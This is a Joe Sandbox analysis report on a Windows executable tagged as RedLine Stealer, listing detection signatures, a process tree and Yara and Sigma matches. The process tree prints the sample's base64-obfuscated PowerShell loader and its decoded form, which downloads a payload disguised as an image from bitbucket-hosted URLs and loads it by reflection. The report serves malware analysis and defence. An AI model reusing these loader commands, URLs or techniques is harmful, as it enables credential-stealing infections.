Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
00wVZ1NU5b.exe

Overview

General Information

Sample name:00wVZ1NU5b.exe
renamed because original name is a hash value
Original sample name:a11a8da90ad22616ca604476cb9f2749.exe
Analysis ID:1604514
MD5:a11a8da90ad22616ca604476cb9f2749
SHA1:a877ecdacdda321bfd73ecd8b18584725fd11cbb
SHA256:e52a775c02065896cacd99b1f7141c40aea77edc9fdbbfa69b900ce1c050d62c
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • 00wVZ1NU5b.exe (PID: 6764 cmdline: "C:\Users\user\Desktop\00wVZ1NU5b.exe" MD5: A11A8DA90AD22616CA604476CB9F2749)
    • cmd.exe (PID: 4340 cmdline: cmd /c lol.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 2328 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\lol.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 5936 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@RgBy@G8@bQBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@p@Ds@I@@g@C@@J@B0@GU@e@B0@C@@PQ@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@Ds@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@9@C@@RwBl@HQ@LQBD@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@LQBi@Hk@d@Bl@EE@cgBy@GE@eQ@g@CQ@ZQBu@GM@V@Bl@Hg@d@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B0@Hk@c@Bl@C@@PQ@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C4@RwBl@HQ@V@B5@H@@ZQ@o@Cc@d@Bl@HM@d@Bw@G8@dwBl@HI@cwBo@GU@b@Bs@C4@S@Bv@GE@YQBh@GE@YQBh@HM@Z@Bt@GU@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@JwB0@Hg@d@@u@Gk@a@Bi@GQ@Z@Bp@Ek@LwBz@GU@b@Bp@GY@LwBn@HI@bw@u@G0@YQBr@HU@cgBl@HM@YQBk@HM@ZQBo@HQ@ZQBi@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 3392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?137113', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.ihbddiI/selif/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 5936JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 5936INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x3c3c1:$b2: ::FromBase64String(
    • 0x7f82c:$b2: ::FromBase64String(
    • 0xf39af:$b2: ::FromBase64String(
    • 0x3c194:$b3: ::UTF8.GetString(
    • 0x7f5ff:$b3: ::UTF8.GetString(
    • 0xf3781:$b3: ::UTF8.GetString(
    • 0x1488d9:$s1: -join
    • 0x151e21:$s1: -join
    • 0x198ff:$s3: reverse
    • 0x20554:$s3: reverse
    • 0x2253b:$s3: reverse
    • 0x2d56a:$s3: reverse
    • 0x62a04:$s3: reverse
    • 0x6e242:$s3: reverse
    • 0xb16c1:$s3: reverse
    • 0xb8854:$s3: reverse
    • 0xf4cf1:$s3: reverse
    • 0xf4fdf:$s3: reverse
    • 0xf56f9:$s3: reverse
    • 0xf5eb2:$s3: reverse
    • 0xfcf9d:$s3: reverse
    Process Memory Space: powershell.exe PID: 6568JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 6568INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x102e1:$b2: ::FromBase64String(
      • 0x4a9ce:$b2: ::FromBase64String(
      • 0x7883e:$b2: ::FromBase64String(
      • 0xa9908:$b2: ::FromBase64String(
      • 0x153d50:$b2: ::FromBase64String(
      • 0x15487f:$b2: ::FromBase64String(
      • 0x224a43:$b2: ::FromBase64String(
      • 0x2e4aab:$b2: ::FromBase64String(
      • 0x100b4:$b3: ::UTF8.GetString(
      • 0x4a7a1:$b3: ::UTF8.GetString(
      • 0x78611:$b3: ::UTF8.GetString(
      • 0xa96db:$b3: ::UTF8.GetString(
      • 0x153b23:$b3: ::UTF8.GetString(
      • 0x154652:$b3: ::UTF8.GetString(
      • 0x224816:$b3: ::UTF8.GetString(
      • 0x2e487e:$b3: ::UTF8.GetString(
      • 0xfaa8c:$s1: -join
      • 0x17f7c1:$s1: -join
      • 0x18c896:$s1: -join
      • 0x18fc68:$s1: -join
      • 0x19031a:$s1: -join

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_6568.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J
        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@x@DM@Nw@x@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwB